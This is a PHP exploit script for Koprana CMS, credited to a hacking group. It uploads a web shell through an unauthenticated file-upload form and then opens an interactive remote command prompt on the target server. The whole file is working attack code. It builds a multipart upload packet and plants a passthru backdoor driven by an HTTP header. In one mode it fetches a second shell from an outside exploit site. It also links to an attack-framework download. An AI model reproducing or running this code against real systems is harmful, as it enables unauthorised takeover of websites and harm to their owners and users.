Koprana CMS remote shell upload exploit written in PHP.
8d3b750e079db72cdf1375b60505c4691cf36b74583357d5e66d952c663400c6
<?php
//NOTE : - If you are using BHR put this file in \exploits\webapp folder
// - BHR Download link => http://www.mediafire.com/?ij9rfpfw6s7uzxf (for windows only)
/*
load exploits/webapp/koprana_upload.php
set HOST target
set PORT Taget_PORT (default : 80)
set MODE (1 for backdoor upload/2 for shell upload)
set FILE (save format TXT/SQL)
exploit
!koprana_upload
@ HOST = localhost = Target URL
@ PORT = 80 = Target Port
@ PATH = / = Web site path
@ MODE = 1 = Exploit Mode
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $port,$packet)
{
if (!($sock = fsockopen($host, $port)))
die("\n[-] No response from {$host}:{$port}\n");
fputs($sock, $packet);
return stream_get_contents($sock);
}
print "\n+-----------------------[ The Crazy3D Team ]--------------------------+";
print "\n| Koprana CMS Remote Upload Exploit |";
print "\n| by The UnKn0wN |";
print "\n| Greets to : The Crazy3D members and all Algerian h4x0rs |";
print "\n+---------------------------------------------------------------------+";
print "\n| www.Dofus-Exploit.com | WwW.IzzI-Hack.com |";
print "\n+---------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <path> <mode>\n";
print "\nExample....: php $argv[0] localhost / 1";
print "\nExample....: php $argv[0] localhost /site/ 2\n";
die();
}
$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$mode = $argv[4];
$shell = "<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";
$shell2 = file_get_contents("http://dofus-exploit.com/exploit/ibiza.txt"); //username : UnKnOwN password : lolilol (You can modify this by your own shell)
if($mode == "2") $shell = $shell2;
$boundary = "---------".str_replace(".", "", microtime());
$payload = "--{$boundary}\r\n";
$payload .= "Content-Disposition: form-data; name=\"fichier\"; filename=\"sh.php\"\r\n";
$payload .= "Content-Type: application/x-php\r\n\r\n";
$payload .= "".$shell."\n\r\n";
$payload .= "--{$boundary}\r\n";
$payload .= "Content-Disposition: form-data; name=\"execute\"\r\n\r\nexecute\r\n";
$payload .= "--{$boundary}\r\n";
$payload .= "Content-Disposition: form-data; name=\"dossier\"\r\n\r\n./\r\n";
$payload .= "--{$boundary}--\r\n";
$packet = "POST {$path}index.php?pages=buy1_ontrue HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary={$boundary}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: keep-alive\r\n\r\n{$payload}";
http_send($host,$port, $packet);
if($mode == "1") {
$packet = "GET {$path}sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
if (!($sock = http_send($host,$port, $packet))) die("\n[-] Upload failed!\n");
print "[+]Backdoor was upload!\n[+]Getting the shell...\n";
while(1)
{
print "\nBHR@{$host}# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
preg_match("/_code_(.*)/s", http_send($host,$port, sprintf($packet, base64_encode($cmd))), $m) ?
print $m[1] : die("\n[-] Exploit failed!\n");
}
}else
print "Go to {$host}{$path}sh.php to check.\n";
?>